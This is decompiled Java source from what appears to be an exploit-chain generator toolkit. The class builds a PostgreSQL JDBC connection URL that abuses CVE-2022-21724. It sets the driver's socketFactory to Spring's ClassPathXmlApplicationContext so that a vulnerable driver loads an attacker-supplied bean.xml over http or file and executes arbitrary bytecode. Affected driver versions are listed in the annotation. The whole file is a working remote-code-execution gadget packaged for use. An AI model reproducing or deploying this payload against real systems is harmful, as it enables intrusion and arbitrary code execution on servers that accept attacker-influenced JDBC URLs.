package com.ar3h.chains.gadget.impl.common.jdbc;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;

@GadgetAnnotation(name = "PostgreSQL JDBC URL CVE-2022-21724", description = "适用于jdbc rce场景，通过 org.springframework.context.support.ClassPathXmlApplicationContext 加载xml，实现执行任意字节码", dependencies = {"org.postgresql:postgresql:org.postgresql.Driver", "9.4.1208 <= org.postgresql:postgresql < 42.2.25", "42.3.0 <= org.postgresql:postgresql < 42.3.2"}, priority = 40)
@GadgetTags(tags = {Tag.PostgreSQLJdbcUrl, Tag.JdbcUrlChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/PostgreSqlJdbc.class */
public class PostgreSqlJdbc implements Gadget {

    @Param(name = "指定加载spring-bean.xml文件路径", description = "支持http和file协议\neg1: http://127.0.0.1:8080/bean.xml\neg2: file://xxx/bean.xml")
    public String url;
    public String driverClassName = "org.postgresql.Driver";

    public String getObject() {
        return "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=" + this.url;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        String object = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return object;
    }
}
